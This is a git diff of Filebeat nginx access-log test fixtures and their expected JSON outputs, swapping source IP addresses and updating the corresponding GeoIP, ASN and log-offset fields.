+ "event.original": "89.160.20.156 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
 "event.outcome": "failure",
 "event.timezone": "-02:00",
 "event.type": [
@@ -72,24 +72,24 @@ "input.type": "log", "log.offset": 199, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.extension": "ico", "url.original": "/favicon.ico", "url.path": "/favicon.ico", @@ -109,7 +109,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "event.original": "89.160.20.156 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ 
@@ -123,24 +123,24 @@ "input.type": "log", "log.offset": 430, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.original": "/adsasd", "url.path": "/adsasd", "user_agent.device.name": "Mac", @@ -159,7 +159,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "event.original": "89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ 
@@ -173,24 +173,24 @@ "input.type": "log", "log.offset": 635, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.original": "/", "url.path": "/", "user_agent.device.name": "Mac", @@ -209,7 +209,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "event.original": "89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ 
@@ -224,24 +224,24 @@ "input.type": "log", "log.offset": 834, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.extension": "ico", "url.original": "/favicon.ico", "url.path": "/favicon.ico", @@ -261,7 +261,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "event.original": "89.160.20.156 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ 
@@ -275,24 +275,24 @@ "input.type": "log", "log.offset": 1065, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.original": "/test", "url.path": "/test", "user_agent.device.name": "Mac", @@ -311,7 +311,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "event.original": "89.160.20.156 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ 
@@ -325,24 +325,24 @@ "input.type": "log", "log.offset": 1268, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.original": "/test", "url.path": "/test", "user_agent.device.name": "Mac", @@ -361,7 +361,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "event.original": "89.160.20.156 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ 
@@ -375,24 +375,24 @@ "input.type": "log", "log.offset": 1471, "nginx.access.remote_ip_list": [ - "77.179.66.156" + "89.160.20.156" ], "related.ip": [ - "77.179.66.156" + "89.160.20.156" ], "service.type": "nginx", - "source.address": "77.179.66.156", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Germersheim", + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 49.2231, - "source.geo.location.lon": 8.3639, - "source.geo.region_iso_code": "DE-RP", - "source.geo.region_name": "Rheinland-Pfalz", - "source.ip": "77.179.66.156", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "url.original": "/test1", "url.path": "/test1", "user_agent.device.name": "Mac", diff --git a/filebeat/module/nginx/access/test/test-with-host.log b/filebeat/module/nginx/access/test/test-with-host.log index 0706028b6a0c..2d4e8a95e14d 100644 --- a/filebeat/module/nginx/access/test/test-with-host.log +++ b/filebeat/module/nginx/access/test/test-with-host.log 
@@ -1,10 +1,10 @@ example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" example.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" -example.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" -example.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" -example.com:80 "10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront" -1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" -1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-" +example.com 10.0.0.2, 10.0.0.1, 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" +example.com:80 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" +example.com:80 "10.5.102.222, 175.16.199.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront" +1.128.3.4 2a02:cf40:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET 
/test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" +1.128.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-" example.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-" -1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" +1.128.3.4 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" example.com localhost, localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" diff --git a/filebeat/module/nginx/access/test/test-with-host.log-expected.json b/filebeat/module/nginx/access/test/test-with-host.log-expected.json index 7de74d8c5402..41401a6e7953 100644 --- a/filebeat/module/nginx/access/test/test-with-host.log-expected.json +++ b/filebeat/module/nginx/access/test/test-with-host.log-expected.json @@ -94,7 +94,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "example.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", + "event.original": "example.com 10.0.0.2, 10.0.0.1, 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ 
@@ -110,24 +110,22 @@ "nginx.access.remote_ip_list": [ "10.0.0.1", "10.0.0.2", - "85.181.35.98" + "81.2.69.143" ], "related.ip": [ - "85.181.35.98" + "81.2.69.143" ], "service.type": "nginx", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "url.domain": "example.com", "url.original": "/ocelot", "url.path": "/ocelot", @@ -149,7 +147,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "example.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"", + "event.original": "example.com:80 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ 
@@ -161,26 +159,24 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 563, + "log.offset": 562, "nginx.access.remote_ip_list": [ - "85.181.35.98" + "81.2.69.143" ], "related.ip": [ - "85.181.35.98" + "81.2.69.143" ], "service.type": "nginx", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "url.domain": "example.com", "url.original": "/ocelot", "url.path": "/ocelot", @@ -202,7 +198,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "example.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", + "event.original": "example.com:80 \"10.5.102.222, 175.16.199.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ 
@@ -214,29 +210,27 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 783, + "log.offset": 781, "nginx.access.remote_ip_list": [ "10.2.1.185", "10.5.102.222", - "199.96.1.1", + "175.16.199.1", "204.246.1.1" ], "related.ip": [ - "199.96.1.1" + "175.16.199.1" ], "service.type": "nginx", - "source.address": "199.96.1.1", - "source.as.number": 19065, - "source.as.organization.name": "Levi, Ray & Shoup, Inc.", - "source.geo.city_name": "Springfield", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 39.7647, - "source.geo.location.lon": -89.7379, - "source.geo.region_iso_code": "US-IL", - "source.geo.region_name": "Illinois", - "source.ip": "199.96.1.1", + "source.address": "175.16.199.1", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "url.domain": "example.com", "url.original": "/assets/xxxx?q=100", "url.path": "/assets/xxxx", 
@@ -247,14 +241,14 @@ }, { "@timestamp": "2016-12-30T06:47:09.000Z", - "destination.ip": "1.2.3.4", + "destination.ip": "1.128.3.4", "event.category": [ "web" ], "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", + "event.original": "1.128.3.4 2a02:cf40:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -270,20 +264,20 @@ "nginx.access.remote_ip_list": [ "10.2.2.121", "10.225.192.17", - "2a03:0000:10ff:f00f:0000:0000:0:8000" + "2a02:cf40:10ff:f00f:0000:0000:0:8000" ], "related.ip": [ - "1.2.3.4", - "2a03:0000:10ff:f00f:0000:0000:0:8000" + "1.128.3.4", + "2a02:cf40:10ff:f00f:0000:0000:0:8000" ], "service.type": "nginx", - "source.address": "2a03:0000:10ff:f00f:0000:0000:0:8000", + "source.address": "2a02:cf40:10ff:f00f:0000:0000:0:8000", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "PT", - "source.geo.country_name": "Portugal", - "source.geo.location.lat": 39.5, - "source.geo.location.lon": -8.0, - "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000", + "source.geo.country_iso_code": "NO", + "source.geo.country_name": "Norway", + "source.geo.location.lat": 62.0, + "source.geo.location.lon": 10.0, + "source.ip": "2a02:cf40:10ff:f00f:0000:0000:0:8000", "url.extension": "html", "url.original": "/test.html", "url.path": "/test.html", 
@@ -294,7 +288,7 @@ }, { "@timestamp": "2018-04-12T07:48:40.000Z", - "destination.ip": "1.2.3.4", + "destination.ip": "1.128.3.4", "destination.port": "80", "event.category": [ "web" @@ -302,7 +296,7 @@ "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"", + "event.original": "1.128.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -312,12 +306,12 @@ "http.response.body.bytes": 0, "http.response.status_code": 400, "input.type": "log", - "log.offset": 1198, + "log.offset": 1200, "nginx.access.remote_ip_list": [ "127.0.0.1" ], "related.ip": [ - "1.2.3.4", + "1.128.3.4", "127.0.0.1" ], "service.type": "nginx", @@ -344,21 +338,21 @@ "http.response.body.bytes": 173, "http.response.status_code": 400, "input.type": "log", - "log.offset": 1269, + "log.offset": 1273, "service.type": "nginx", "source.address": "unix:", "url.domain": "example.com" }, { "@timestamp": "2017-05-29T19:02:48.000Z", - "destination.ip": "1.2.3.4", + "destination.ip": "1.128.3.4", "event.category": [ "web" ], "event.dataset": "nginx.access", "event.kind": "event", "event.module": "nginx", - "event.original": "1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", + "event.original": "1.128.3.4 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ 
@@ -370,12 +364,12 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 1347, + "log.offset": 1351, "nginx.access.remote_ip_list": [ "localhost" ], "related.ip": [ - "1.2.3.4" + "1.128.3.4" ], "service.type": "nginx", "source.address": "localhost", @@ -410,7 +404,7 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 1506, + "log.offset": 1512, "nginx.access.remote_ip_list": [ "localhost", "localhost" diff --git a/filebeat/module/nginx/access/test/test.log b/filebeat/module/nginx/access/test/test.log index 50781d9d7aa6..1fc358555025 100644 --- a/filebeat/module/nginx/access/test/test.log +++ b/filebeat/module/nginx/access/test/test.log 
@@ -1,9 +1,9 @@
 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
-10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
-85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
-"10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront"
-2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)"
+10.0.0.2, 10.0.0.1, 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
+81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
+"10.5.102.222, 175.16.199.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront"
+2a02:cf40:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)"
 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-"
 unix: -
- [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-"
